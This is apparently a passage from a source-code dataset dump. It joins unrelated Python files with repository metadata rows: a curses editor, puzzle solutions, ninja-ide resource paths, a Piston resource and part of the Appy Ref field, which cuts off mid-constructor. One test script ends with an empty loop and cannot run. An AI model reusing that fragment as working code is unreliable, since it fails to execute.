        headers = self.GetHeadersFromWorksheet(sSpreadsheetKey, sWorksheetId)
        rows = []
        feed = self.spr_client.GetListFeed(key=sSpreadsheetKey, wksht_id=sWorksheetId)
        for i, entry in enumerate(feed.entry):
            row = OrderedDict()
            row['id'] = i
            for header in headers:
                row[header] = entry.custom[header].text
            rows.append(row)
        return rows

    def PutRowsIntoWorksheet(self, sSpreadsheetKey, sWorksheetId, aRows):
        """Appends each row dict in *aRows* to the worksheet."""
        for dRow in aRows:
            # Unused return value dropped.
            self.spr_client.InsertRow(dRow, sSpreadsheetKey, sWorksheetId)
|
UTF-8
|
Python
| false | false | 2,014 |
11,244,224,418,851 |
47febad3c887d05cf232ceff27f777938a99a400
|
732305d7fc721d0090e465bda635592f3f5e1ae7
|
/pad/pad
|
5361a009f1d92ff0a1535d4c23600542ed4c18b6
|
[
"GPL-3.0-only"
] |
non_permissive
|
cheery/language
|
https://github.com/cheery/language
|
8e2711c8f6079d2d85ea09f19bc748b9d7649cbb
|
629bfc722f5c7f64ceb786ea825dda1dc3a86ef8
|
refs/heads/master
| 2021-01-10T22:11:50.502117 | 2014-09-02T14:03:45 | 2014-09-02T14:03:45 | 19,088,666 | 3 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/python3
import curses
from codecard import *
high = 1 << 32
tabsize = 4
def main(screen):
    # Entry point for curses.wrapper(): configure the terminal, then run a
    # minimal edit loop until Escape (\x1b) is typed.
    curses.cbreak()    # deliver keys immediately, without waiting for Enter
    curses.noecho()    # do not echo typed characters
    curses.meta(1)     # allow 8-bit input
    screen.keypad(0)   # keep escape sequences raw instead of KEY_* codes
    card = Card()
    #pad = Pad(Card(), motion, "pad")
    key = ''
    #while pad.modes:
        #pad.modes[-1](screen, pad)
    while key != '\x1b':
        draw(screen, card, repr(key))
        key = screen.getkey()
        if key == '\n':
            # Enter: append a fresh line buffer at the card's bottom.
            # NOTE(review): Card/TextLineBuffer/TextBuffer come from the
            # codecard module; the exact semantics of card.put/card.bot are
            # not visible here -- confirm against codecard.
            card.put(card.bot, TextLineBuffer(None, Line(), [], Line()))
        else:
            # Any other key: append its character(s) as a text buffer.
            card.put(card.bot, TextBuffer(None, list(key)))
def draw(screen, card, message):
    """Repaint the screen: one row per card line (indented by the module
    tabsize), then *message* on the bottom row."""
    height, width = screen.getmaxyx()
    screen.clear()
    row = 0
    for line in card.lines:
        screen.addstr(row, line.indent * tabsize, ''.join(line.text))
        row += 1
    screen.addstr(height - 1, 0, message)
    # screen.move(y, x)
    screen.refresh()
#def motion(screen, pad):
# card = pad.card
# #card.y = clamp(card.y, 0, len(card.lines) - 1)
# #card.x = clamp(card.x, 0, len(card.line) - 1)
# draw(screen, card, pad.message, card.head, card.y)
# pad.message = ''
# text = screen.getkey()
# if text == '\x1b':
# pad.modes.pop(-1)
# elif text == 'i':
# pad.modes.append(insert)
# elif text == 'I':
# card.x = 0
# pad.modes.append(insert)
# elif text == 'a':
# card.x = card.head + 1
# pad.modes.append(insert)
# elif text == 'A':
# card.x = high
# pad.modes.append(insert)
# elif text == '0':
# card.x = 0
# elif text == '$':
# card.x = high
# elif text == 'h' and card.head > card.line.base:
# card.x = card.head - 1
# elif text == '\x7f' and card.head > card.line.base:
# card.x = card.head - 1
# elif text == '\x7f' and card.y > 0:
# card.x = len(card.line)
# card.y -= 1
# elif text == 'l' and card.head < card.line.tail - 1:
# card.x = card.head + 1
# elif text == 'j' or text == '\n':
# card.y = clamp(card.y+1, 0, len(card.lines) - 1)
# elif text == 'J' and card.y + 1 < len(card.lines):
# card.x = card.join_line(card.y)
# elif text == 'k':
# card.y = clamp(card.y-1, 0, len(card.lines) - 1)
# elif text == 'A':
# card.x = len(card.line)
# pad.modes.append(insert)
# elif text == 'o':
# card.y = card.insert_line(card.y+1, Line('', card.line.indent))
# card.x = 0
# pad.modes.append(insert)
# elif text == 'O':
# card.y = card.insert_line(card.y, Line('', card.line.indent))
# card.x = 0
# pad.modes.append(insert)
# elif text == '<' and card.line.indent > 0:
# card.line.indent -= 1
# elif text == '>':
# card.line.indent += 1
# elif text == '_':
# card.x = card.line.base
# elif text == 'x':
# card.line.remove(card.head)
# elif text == 'd':
# card.lines.pop(card.y)
# if len(card.lines) == 0:
# card.lines.append(Line(''))
# card.y = clamp(card.y, 0, len(card.lines) - 1)
#
#def insert(screen, pad):
# card = pad.card
# draw(screen, card, '-- insert --' + pad.message, card.index, card.y)
# text = screen.getkey()
# if text == '\x1b':
# pad.modes.pop(-1)
# elif text == '\x7f' and card.index > card.line.base:
# index = card.index - 1
# card.x = index
# card.line.remove(index)
# elif text == '\x7f' and card.index > 0:
# card.line.indent -= 1
# card.x = card.line.base
# elif text == '\x7f' and card.index == 0 and card.y > 0:
# card.x = card.join_line(card.y-1)
# card.y = card.y - 1
# elif text == '\n':
# card.lines[card.y], tail = card.line.split(card.index)
# card.y = card.insert_line(card.y+1, tail)
# card.x = card.line.base
# elif text == '\t':
# base = card.line.base
# card.line.indent += 1
# card.x = card.index + card.line.base - base
# else:
# card.x = card.line.insert(card.index, text)
# pad.message = repr(text)
#
#
#class Pad:
# def __init__(self, card, mode, message):
# self.card = card
# self.modes = [mode]
# self.message = message
#
#class Card:
# def __init__(self, lines=None, x=0, y=0):
# self.lines = lines or [Line()]
# self.x = x
# self.y = y
#
# @property
# def index(self):
# return clamp(self.x, self.line.base, self.line.tail)
#
# @property
# def head(self):
# return clamp(self.x, self.line.base, self.line.tail-1)
#
# @property
# def line(self):
# assert 0 <= self.y <= len(self.lines)
# return self.lines[self.y]
#
# def insert_line(self, y, line):
# assert isinstance(line, Line)
# self.lines.insert(y, line)
# return y
#
# def remove_line(self, y):
# return self.lines.pop(y)
#
# def join_line(self, y):
# i = self.lines[y].tail
# self.lines[y] += self.lines.pop(y+1)
# return i
#
#class Line:
# def __init__(self, text='', indent=0):
# self.text = text
# self.indent = indent
#
# @property
# def base(self):
# return self.indent * tabsize
#
# @property
# def tail(self):
# return self.indent * tabsize + len(self.text)
#
# def insert(self, i, text):
# i -= self.base
# assert 0 <= i <= len(self.text)
# self.text = self.text[:i] + text + self.text[i:]
# return i + len(text) + self.base
#
# def remove(self, i, length=1):
# i -= self.base
# assert 0 <= i <= len(self.text)
# text = self.text[i:i+length]
# self.text = self.text[:i] + self.text[i+length:]
# return text
#
# def split(self, i):
# i -= self.base
# head = Line(self.text[:i], self.indent)
# tail = Line(self.text[i:], self.indent)
# return head, tail
#
# def __add__(self, other):
# return Line(self.text + other.text, self.indent)
def clamp(x, mi, ma):
    """Restrict *x* to [mi, ma]; when mi > ma, mi wins (as before)."""
    capped = min(x, ma)
    return max(capped, mi)
if __name__=='__main__':
curses.wrapper(main)
|
UTF-8
|
Python
| false | false | 2,014 |
19,464,791,808,354 |
f6972e938773dc59d2793158092ce706fed4e20e
|
65f4901a2cc52a1d44199a4825b46541d29425f5
|
/snapchat_fs/__init__.py
|
abbfe4c1064ae341e4fa5e43c5aa86e40f4b2053
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Aaron1011/snapchat-fs
|
https://github.com/Aaron1011/snapchat-fs
|
f94f31d7930b0937c958d33397aef410d804df72
|
34a763bb0a57b11b6a4a5804014493258d0fb494
|
refs/heads/master
| 2023-03-11T02:37:16.102618 | 2013-12-27T09:38:52 | 2013-12-27T09:38:52 | 15,534,953 | 0 | 0 |
MIT
| true | 2023-02-23T00:16:40 | 2013-12-30T19:35:40 | 2014-01-09T21:49:10 | 2023-02-23T00:16:40 | 130 | 0 | 0 | 1 |
Python
| false | false |
from snapchatfs import list_all_downloadable_sfs_files, download_all_sfs, download_by_id, upload_sfs_file
|
UTF-8
|
Python
| false | false | 2,013 |
1,872,605,764,681 |
ed8e92843bb84e1b1d90d098fe8661ebe6d3e8f2
|
eeaba1d58896d44fcce20df42633ab7df204491c
|
/project_euler/prob56.py
|
b42baac1dbaf1b13f24a00231086c96673e379a3
|
[
"GPL-3.0-only"
] |
non_permissive
|
BenLand100/ScratchCode
|
https://github.com/BenLand100/ScratchCode
|
9d014164074b59859df3bd005df0428766c0421e
|
fd8c02247a19f81d25065af43ba1e8d943a588b0
|
refs/heads/master
| 2021-01-13T02:17:59.532211 | 2011-03-23T02:12:26 | 2011-03-23T02:12:26 | 1,277,431 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/python
def sum_digits(x):
    """Return the sum of the decimal digits of non-negative integer *x*.

    Uses divmod (floor division) instead of the original ``x /= 10``:
    behaviour is identical under Python 2, where ``/`` on ints was already
    floor division, and correct under Python 3, where ``/=`` would yield
    floats and never terminate properly.
    """
    total = 0
    while x > 0:
        x, digit = divmod(x, 10)
        total += digit
    return total
print sorted([sum_digits(a**b) for a in range(100) for b in range(100)])[-1]
|
UTF-8
|
Python
| false | false | 2,011 |
14,860,586,863,631 |
234aae8c2a5189da05c68559d06a455aabefcd04
|
b5324f1a14dc5757ce5cc0027d09078e7335f55d
|
/selftest/dir2/skipall.py
|
9ad6a348d14bbd324af925a8ddf54b808afc763b
|
[
"BSD-2-Clause"
] |
permissive
|
depp/idiotest
|
https://github.com/depp/idiotest
|
70d09fef8f9467ab2aa468afb71767270d1cd4f0
|
44c4c647b340625634931e4222482052343b369a
|
refs/heads/master
| 2021-01-13T01:26:50.259368 | 2012-01-12T00:03:22 | 2012-01-12T00:03:33 | 3,117,560 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Copyright 2012 Dietrich Epp <[email protected]>
# See LICENSE.txt for details.
@test
def failure():
    # NOTE(review): `test` and `fail` are not defined in this file; they are
    # presumably injected into the module namespace by the idiotest runner --
    # confirm against the framework. This case is intentionally failing; the
    # module-level skip_module() call below skips the whole file.
    fail()
skip_module()
|
UTF-8
|
Python
| false | false | 2,012 |
9,689,446,244,081 |
5643446fb29a6466c9b7caa2e9148d0102434c80
|
2d9e95a2b5c40e229438d14fb62aea46e423624f
|
/dfsTest.py
|
2a42962e30c27641cb4c75da3b6a41a71ac29082
|
[] |
no_license
|
IhsanE/Algorithms
|
https://github.com/IhsanE/Algorithms
|
dc3fb41d8e63ffc74287ddd0c6476b54adf8daf8
|
6173d1df1af0a5cef16ca34fa8101b30ffa9d0e7
|
refs/heads/master
| 2021-01-20T12:04:20.455942 | 2014-04-12T15:57:35 | 2014-04-12T15:57:35 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
def dfs(G, s):
    """Depth-first search of graph *G* (adjacency dict) from source *s*.

    Returns a parent map: parent[v] is the vertex from which v was first
    discovered, with parent[s] = None.
    """
    parent = {s: None}
    stack = [s]
    while stack:
        node = stack.pop()
        for neighbour in G[node]:
            if neighbour not in parent:
                parent[neighbour] = node
                stack.append(neighbour)
    return parent
#goal=int(raw_input())
# str = n c
def factor(n):
    """Return the divisors of *n*, preserving the original output order:
    [1, n, <divisors from 2 up to n//2 in increasing order>].

    Uses range() and // so the function runs under both Python 2 and
    Python 3; the original ``xrange``/``n/2`` break under Python 3 while
    behaving identically to this version under Python 2.

    Note: factor(1) returns [1, 1], exactly as the original did.
    """
    factors = [1, n]
    for i in range(2, n // 2 + 1):
        if n % i == 0:
            factors.append(i)
    return factors
print factor(1)
G={}
G[1]=factor(1)
for i in xrange(5):
|
UTF-8
|
Python
| false | false | 2,014 |
9,586,367,034,027 |
49069323b7f59ed7b81ad80c3499ad95f00d7225
|
97b65e28bb6a202108acfd9d069aad185a6e126c
|
/TKINTER/ninja-ide/resources.py
|
8cd2a4174ef8dc1cecb3b22d6725bbfdfe870448
|
[] |
no_license
|
calpe20/PYTHONIZANDO
|
https://github.com/calpe20/PYTHONIZANDO
|
7f217a5d03aca18307acc0c672dbe30393cc4c63
|
4899fc150596b11dfe33c5da2f0de4b2458a0dac
|
refs/heads/master
| 2020-04-22T13:44:41.239647 | 2013-06-14T00:19:08 | 2013-06-14T00:19:08 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#-*-coding:utf-8-*-
import os, sys

# Keyboard shortcut modifier: Cmd on Apple builds of Python, Ctrl elsewhere.
OS_VERSION = sys.version
OS_KEY = 'Cmd' if 'Apple' in OS_VERSION else 'Ctrl'

# Absolute path of the directory containing this module.
PRJ_PATH = os.path.abspath(os.path.dirname(__file__))
createpath = os.path.join


def _img(*parts):
    # Build an absolute path inside the project's img/ directory.
    return os.path.join(PRJ_PATH, 'img', *parts)

# Icon name -> absolute image path.
images = {
    'splash': _img('splash.png'),
    'icon': _img('icon.png'),
    'new': _img('document-new.png'),
    'newProj': _img('project-new.png'),
    'open': _img('document-open.png'),
    'openProj': _img('project-open.png'),
    'openFolder': _img('folder-open.png'),
    'save': _img('document-save.png'),
    'saveAs': _img('document-save-as.png'),
    'saveAll': _img('document-save-all.png'),
    'copy': _img('edit-copy.png'),
    'cut': _img('edit-cut.png'),
    'paste': _img('edit-paste.png'),
    'redo': _img('edit-redo.png'),
    'undo': _img('edit-undo.png'),
    'find': _img('find.png'),
    'findReplace': _img('find-replace.png'),
    'play': _img('play.png'),
    'stop': _img('stop.png'),
    'file-run': _img('file-run.png'),
    'debug': _img('debug.png'),
    'designer': _img('qtdesigner.png'),
    'bug': _img('bug.png'),
    'function': _img('function.png'),
    'module': _img('module.png'),
    'class': _img('class.png'),
    'attribute': _img('attribute.png'),
    'web': _img('web.png'),
    'splitH': _img('split-horizontal.png'),
    'splitV': _img('split-vertical.png'),
    'splitCRotate': _img('panels-change-position.png'),
    'splitMRotate': _img('panels-change-vertical-position.png'),
    'indent-less': _img('indent-less.png'),
    'indent-more': _img('indent-more.png'),
    'console': _img('console.png'),
    'pref': _img('preferences-system.png'),
    'tree-app': _img('tree', 'project', 'tree-app.png'),
    'tree-code': _img('tree', 'project', 'tree-code.png'),
    'tree-folder': _img('tree', 'project', 'tree-folder.png'),
    'tree-html': _img('tree', 'project', 'tree-html.png'),
    'tree-generic': _img('tree', 'project', 'tree-generic.png'),
    'tree-css': _img('tree', 'project', 'tree-CSS.png'),
    'tree-java': _img('tree', 'project', 'tree-java.png'),
    'tree-python': _img('tree', 'project', 'tree-python.png'),
    'tree-image': _img('tree', 'project', 'tree-image.png'),
    'comment-code': _img('comment-code.png'),
    'uncomment-code': _img('uncomment-code.png'),
    'reload-file': _img('reload-file.png'),
}

# Miscellaneous project locations.
syntax_files = os.path.join(PRJ_PATH, 'plugins', 'syntax')
plugins = os.path.join(PRJ_PATH, 'plugins')
start_page_url = os.path.join(PRJ_PATH, 'doc', 'startPage.html')
descriptor = os.path.join(PRJ_PATH, 'plugins', 'descriptor.json')
twits = os.path.join(PRJ_PATH, 'doc', 'twit_posts.txt')
bugs_page = 'http://code.google.com/p/ninja-ide/issues/list'
|
UTF-8
|
Python
| false | false | 2,013 |
7,224,135,034,814 |
59f0d6a9106a70d7ff29ff555bad29dda8dc82fa
|
9db31c94158759485ac9e5163a02f8d3b0d4ae72
|
/src/bv/server/api/resource.py
|
c01491e851e46c2017ffae2fb15126d478fa77f5
|
[] |
no_license
|
gpierre42/bv.server
|
https://github.com/gpierre42/bv.server
|
a8b99ee34ad0302d3e836114dbde25934526991c
|
3d1081011d1bfb103bca2ce7698e24425da494cf
|
refs/heads/master
| 2021-01-14T14:03:09.931251 | 2010-11-26T15:25:58 | 2010-11-26T15:25:58 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from piston.resource import Resource as PistonResource
from piston.utils import rc
import json
class Resource(PistonResource):
    """Piston Resource that reports form-validation failures as 400s."""

    def form_validation_response(self, e):
        """Return a BAD_REQUEST response whose body lists the form errors."""
        resp = rc.BAD_REQUEST
        errors = dict(e.form.errors.items())
        resp.write(' ' + str(errors))
        return resp
|
UTF-8
|
Python
| false | false | 2,010 |
6,279,242,208,642 |
f85b4e0669f347f675b52a663d1c1ec36058c686
|
652c79428e003a31ec02afe66f6944708093ed45
|
/GCJ_2009/Round2-A/main.py
|
d0095b45f1f0670cf6d1974704b866847758c65b
|
[] |
no_license
|
saitodev/py-practice
|
https://github.com/saitodev/py-practice
|
c3c08de4c5c802dea7859099651708e63f2acda5
|
da0ed7c7b16cdec5a9e7acd469b05955c4c4d880
|
refs/heads/master
| 2016-09-06T06:53:52.420997 | 2014-10-13T07:45:34 | 2014-10-13T07:45:34 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
def count_one(s):
    """Return the 1-based position of the last '1' in *s*, or 0 if none."""
    # str.rfind gives the 0-based index of the last occurrence (-1 when
    # absent), so adding 1 yields exactly what the original loop computed.
    return s.rfind('1') + 1
def solve(n, rows):
    """Return the minimum number of adjacent swaps needed to arrange rows.

    rows[i] is the 1-based position of the last '1' in row i; row j may
    occupy slot i only when rows[j] <= i + 1. For each slot we take the
    first usable row at or below it and bubble it up, costing j - i swaps.

    Note: *rows* is modified in place, as in the original implementation.
    Uses range() instead of xrange so the function also runs under
    Python 3; behaviour under Python 2 is unchanged.
    """
    ans = 0
    for i in range(n):
        for j in range(i, n):
            if rows[j] <= i + 1:
                # Rotate rows[i..j] right by one: row j moves up to slot i.
                rows[i], rows[i+1:j+1] = rows[j], rows[i:j]
                ans += j - i
                break
    return ans
def main():
    # Google Code Jam driver: read the number of test cases, then for each
    # case read n rows of binary digits and print the minimum swap count in
    # "Case #k: v" format.
    # NOTE: Python 2 only (raw_input, xrange and the print statement).
    t = int(raw_input())
    for i in xrange(1, t+1):
        n = int(raw_input())
        rows = [count_one(raw_input()) for _ in xrange(n)]
        print "Case #%d: %d" % (i, solve(n, rows))
if __name__ == '__main__':
main()
|
UTF-8
|
Python
| false | false | 2,014 |
18,691,697,686,474 |
66116529a6a8be3a0d2e196d4d037d38bb09f816
|
42866c294c8efef883e77ee27d786686ef880f9e
|
/appy/fields/ref.py
|
10592588f1ded3a938402d10b45d6a657671768d
|
[
"GPL-3.0-only"
] |
non_permissive
|
jeffbayes/django-sis
|
https://github.com/jeffbayes/django-sis
|
c6b45464096f007d8f5400365cbcf2824b52d1da
|
b9290799f4835a8ffc2178f10ae7ec8d3261aa90
|
refs/heads/master
| 2021-01-21T07:16:39.154955 | 2014-02-14T21:01:45 | 2014-02-14T21:01:45 | 16,302,019 | 1 | 0 | null | true | 2014-02-14T21:01:46 | 2014-01-28T04:22:42 | 2014-02-14T21:01:45 | 2014-02-14T21:01:45 | 22,208 | 0 | 0 | 0 |
Python
| null | null |
# ------------------------------------------------------------------------------
# This file is part of Appy, a framework for building applications in the Python
# language. Copyright (C) 2007 Gaetan Delannay
# Appy is free software; you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation; either version 3 of the License, or (at your option) any later
# version.
# Appy is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along with
# Appy. If not, see <http://www.gnu.org/licenses/>.
# ------------------------------------------------------------------------------
import sys, re
from appy.fields import Field, No
from appy.px import Px
from appy.gen.layout import Table
from appy.gen import utils as gutils
from appy.shared import utils as sutils
# ------------------------------------------------------------------------------
class Ref(Field):
# Some default layouts. "w" stands for "wide": those layouts produce tables
# of Ref objects whose width is 100%.
wLayouts = Table('lrv-f', width='100%')
# "d" stands for "description": a description label is added.
wdLayouts = {'view': Table('l-d-f', width='100%')}
# This PX displays the title of a referenced object, with a link on it to
# reach the consult view for this object. If we are on a back reference, the
# link allows to reach the correct page where the forward reference is
# defined. If we are on a forward reference, the "nav" parameter is added to
# the URL for allowing to navigate from one object to the next/previous on
# ui/view.
pxObjectTitle = Px('''
<x var="navInfo='ref.%s.%s:%s.%d.%d' % (zobj.UID(), field.name, \
field.pageName, loop.ztied.nb + startNumber, totalNumber);
navInfo=not field.isBack and navInfo or '';
cssClass=ztied.getCssFor('title')">
<x>::ztied.getSupTitle(navInfo)</x>
<a var="pageName=field.isBack and field.back.pageName or 'main';
fullUrl=ztied.getUrl(page=pageName, nav=navInfo)"
href=":fullUrl" class=":cssClass">:(not includeShownInfo) and \
ztied.Title() or field.getReferenceLabel(ztied.appy())
</a><span name="subTitle" style=":showSubTitles and 'display:inline' or \
'display:none'">::ztied.getSubTitle()"</span>
</x>''')
# This PX displays icons for triggering actions on a given referenced object
# (edit, delete, etc).
pxObjectActions = Px('''
<table class="noStyle" var="isBack=field.isBack">
<tr>
<!-- Arrows for moving objects up or down -->
<td if="not isBack and (len(zobjects)>1) and changeOrder and canWrite"
var2="objectIndex=field.getIndexOf(zobj, ztied);
ajaxBaseCall=navBaseCall.replace('**v**','%s,%s,{%s:%s,%s:%s}'%\
(q(startNumber), q('ChangeRefOrder'), q('refObjectUid'),
q(ztied.UID()), q('move'), q('**v**')))">
<img if="objectIndex > 0" class="clickable" src=":url('arrowUp')"
title=":_('move_up')"
onclick=":ajaxBaseCall.replace('**v**', 'up')"/>
<img if="objectIndex < (totalNumber-1)" class="clickable"
src=":url('arrowDown')" title=":_('move_down')"
onclick=":ajaxBaseCall.replace('**v**', 'down')"/>
</td>
<!-- Workflow transitions -->
<td if="ztied.showTransitions('result')"
var2="targetObj=ztied">:targetObj.appy().pxTransitions</td>
<!-- Edit -->
<td if="not field.noForm and ztied.mayEdit() and field.delete">
<a var="navInfo='ref.%s.%s:%s.%d.%d' % (zobj.UID(), field.name, \
field.pageName, loop.ztied.nb+startNumber, totalNumber)"
href=":ztied.getUrl(mode='edit', page='main', nav=navInfo)">
<img src=":url('edit')" title=":_('object_edit')"/></a>
</td>
<!-- Delete -->
<td if="not isBack and field.delete and canWrite and ztied.mayDelete()">
<img class="clickable" title=":_('object_delete')" src=":url('delete')"
onclick=":'onDeleteObject(%s)' % q(ztied.UID())"/>
</td>
<!-- Unlink -->
<td if="not isBack and field.unlink and canWrite">
<img class="clickable" title=":_('object_unlink')" src=":url('unlink')"
onclick=":'onUnlinkObject(%s,%s,%s)' % (q(zobj.UID()), \
q(field.name), q(ztied.UID()))"/>
</td>
</tr>
</table>''')
# Displays the button allowing to add a new object through a Ref field, if
# it has been declared as addable and if multiplicities allow it.
pxAdd = Px('''
<input if="showPlusIcon" type="button" class="button"
var2="navInfo='ref.%s.%s:%s.%d.%d' % (zobj.UID(), \
field.name, field.pageName, 0, totalNumber);
formCall='goto(%s)' % \
q('%s/do?action=Create&className=%s&nav=%s' % \
(folder.absolute_url(), linkedPortalType, navInfo));
formCall=not field.addConfirm and formCall or \
'askConfirm(%s,%s,%s)' % (q('script'), q(formCall), \
q(addConfirmMsg));
noFormCall=navBaseCall.replace('**v**', \
'%d,%s' % (startNumber, q('CreateWithoutForm')));
noFormCall=not field.addConfirm and noFormCall or \
'askConfirm(%s, %s, %s)' % (q('script'), q(noFormCall), \
q(addConfirmMsg))"
style=":url('buttonAdd', bg=True)" value=":_('add_ref')"
onclick=":field.noForm and noFormCall or formCall"/>''')
# This PX displays, in a cell header from a ref table, icons for sorting the
# ref field according to the field that corresponds to this column.
pxSortIcons = Px('''
<x if="changeOrder and canWrite and ztool.isSortable(field.name, \
zobjects[0].meta_type, 'ref')"
var2="ajaxBaseCall=navBaseCall.replace('**v**', '%s,%s,{%s:%s,%s:%s}'% \
(q(startNumber), q('SortReference'), q('sortKey'), \
q(field.name), q('reverse'), q('**v**')))">
<img class="clickable" src=":url('sortAsc')"
onclick=":ajaxBaseCall.replace('**v**', 'False')"/>
<img class="clickable" src=":url('sortDesc')"
onclick=":ajaxBaseCall.replace('**v**', 'True')"/>
</x>''')
# This PX is called by a XmlHttpRequest (or directly by pxView) for
# displaying the referred objects of a reference field.
pxViewContent = Px('''
<div var="field=zobj.getAppyType(req['fieldName']);
innerRef=req.get('innerRef', False) == 'True';
ajaxHookId=zobj.UID() + field.name;
startNumber=int(req.get('%s_startNumber' % ajaxHookId, 0));
info=field.getLinkedObjects(zobj, startNumber);
zobjects=info.objects;
totalNumber=info.totalNumber;
batchSize=info.batchSize;
batchNumber=len(zobjects);
folder=zobj.getCreateFolder();
linkedPortalType=ztool.getPortalType(field.klass);
canWrite=not field.isBack and zobj.allows(field.writePermission);
showPlusIcon=zobj.mayAddReference(field.name);
atMostOneRef=(field.multiplicity[1] == 1) and \
(len(zobjects)<=1);
addConfirmMsg=field.addConfirm and \
_('%s_addConfirm' % field.labelId) or '';
navBaseCall='askRefField(%s,%s,%s,%s,**v**)' % \
(q(ajaxHookId), q(zobj.absolute_url()), \
q(field.name), q(innerRef));
changeOrder=field.changeOrderEnabled(zobj);
showSubTitles=req.get('showSubTitles', 'true') == 'true'"
id=":ajaxHookId">
<!-- The definition of "atMostOneRef" above may sound strange: we
shouldn't check the actual number of referenced objects. But for
back references people often forget to specify multiplicities. So
concretely, multiplicities (0,None) are coded as (0,1). -->
<!-- Display a simplified widget if at most 1 referenced object. -->
<table if="atMostOneRef">
<tr valign="top">
<!-- If there is no object -->
<x if="not zobjects">
<td class="discreet">:_('no_ref')</td>
<td>:field.pxAdd</td>
</x>
<!-- If there is an object -->
<x if="zobjects">
<td for="ztied in zobjects"
var2="includeShownInfo=True">:field.pxObjectTitle</td>
</x>
</tr>
</table>
<!-- Display a table in all other cases -->
<x if="not atMostOneRef">
<div if="not innerRef or showPlusIcon" style="margin-bottom: 4px">
(<x>:totalNumber</x>)
<x>:field.pxAdd</x>
<!-- The search button if field is queryable -->
<input if="zobjects and field.queryable" type="button" class="button"
style=":url('buttonSearch', bg=True)" value=":_('search_title')"
onclick=":'goto(%s)' % \
q('%s/ui/search?className=%s&ref=%s:%s' % \
(ztool.absolute_url(), linkedPortalType, zobj.UID(), \
field.name))"/>
</div>
<!-- Appy (top) navigation -->
<x>:obj.pxAppyNavigate</x>
<!-- No object is present -->
<p class="discreet" if="not zobjects">:_('no_ref')</p>
<table if="zobjects" class=":innerRef and 'innerAppyTable' or ''"
width="100%">
<tr valign="bottom">
<td>
<!-- Show forward or backward reference(s) -->
<table class="not innerRef and 'list' or ''"
width=":innerRef and '100%' or field.layouts['view']['width']"
var="columns=zobjects[0].getColumnsSpecifiers(\
field.shownInfo, dir)">
<tr if="field.showHeaders">
<th for="column in columns" width=":column['width']"
align="column['align']"
var2="field=column['field']">
<span>:_(field.labelId)</span>
<x>:field.pxSortIcons</x>
<x var="className=linkedPortalType">:obj.pxShowDetails</x>
</th>
</tr>
<tr for="ztied in zobjects" valign="top"
class=":loop.ztied.odd and 'even' or 'odd'">
<td for="column in columns"
width=":column['width']" align=":column['align']"
var2="field=column['field']">
<!-- The "title" field -->
<x if="python: field.name == 'title'">
<x>:field.pxObjectTitle</x>
<div if="ztied.mayAct()">:field.pxObjectActions</div>
</x>
<!-- Any other field -->
<x if="field.name != 'title'">
<x var="zobj=ztied; obj=ztied.appy(); layoutType='cell';
innerRef=True"
if="zobj.showField(field.name, \
layoutType='result')">:field.pxView</x>
</x>
</td>
</tr>
</table>
</td>
</tr>
</table>
<!-- Appy (bottom) navigation -->
<x>:obj.pxAppyNavigate</x>
</x>
</div>''')
pxView = pxCell = Px('''
<x var="x=req.set('fieldName', field.name)">:field.pxViewContent</x>''')
pxEdit = Px('''
<select if="field.link"
var2="requestValue=req.get(name, []);
inRequest=req.has_key(name);
zobjects=field.getSelectableObjects(obj);
uids=[o.UID() for o in \
field.getLinkedObjects(zobj).objects];
isBeingCreated=zobj.isTemporary()"
name=":name" size="isMultiple and field.height or ''"
multiple="isMultiple and 'multiple' or ''">
<option value="" if="not isMultiple">:_('choose_a_value')"></option>
<option for="ztied in zobjects" var2="uid=ztied.o.UID()"
selected=":inRequest and (uid in requestValue) or \
(uid in uids)"
value=":uid">:field.getReferenceLabel(ztied)</option>
</select>''')
pxSearch = Px('''<x>
<label lfor=":widgetName">:_(field.labelId)"></label><br/>
<!-- The "and" / "or" radio buttons -->
<x if="field.multiplicity[1] != 1"
var2="operName='o_%s' % name;
orName='%s_or' % operName;
andName='%s_and' % operName">
<input type="radio" name=":operName" id=":orName" checked="checked"
value="or"/>
<label lfor=":orName">:_('search_or')"></label>
<input type="radio" name=":operName" id=":andName" value="and"/>
<label lfor=":andName">:_('search_and')"></label><br/>
</x>
<!-- The list of values -->
<select name=":widgetName" size=":field.sheight" multiple="multiple">
<option for="v in ztool.getSearchValues(name, className)"
var2="uid=v[0]; title=field.getReferenceLabel(v[1])" value=":uid"
title=":title">:ztool.truncateValue(title,field.swidth)"></option>
</select>
</x>''')
    def __init__(self, klass=None, attribute=None, validator=None,
                 multiplicity=(0,1), default=None, add=False, addConfirm=False,
                 delete=None, noForm=False, link=True, unlink=None, back=None,
                 show=True, page='main', group=None, layouts=None,
                 showHeaders=False, shownInfo=(), select=None, maxPerPage=30,
                 move=0, indexed=False, searchable=False,
                 specificReadPermission=False, specificWritePermission=False,
                 width=None, height=5, maxChars=None, colspan=1, master=None,
                 masterValue=None, focus=False, historized=False, mapping=None,
                 label=None, queryable=False, queryFields=None, queryNbCols=1,
                 navigable=False, searchSelect=None, changeOrder=True,
                 sdefault='', scolspan=1, swidth=None, sheight=None):
        '''Initialise a Ref field pointing to instances of p_klass.

        Only Ref-specific parameters are documented inline below; the
        remaining parameters are forwarded unchanged to Field.__init__.'''
        # The class of the tied objects (may be set after the fact for
        # auto-references; see the comment further down).
        self.klass = klass
        # Name of the attribute, on self.klass, holding the back reference.
        self.attribute = attribute
        # May the user add new objects through this ref ?
        self.add = add
        # When the user adds a new object, must a confirmation popup be shown?
        self.addConfirm = addConfirm
        # May the user delete objects via this Ref?
        self.delete = delete
        if delete == None:
            # By default, one may delete objects via a Ref for which one can
            # add objects.
            self.delete = bool(self.add)
        # If noForm is True, when clicking to create an object through this ref,
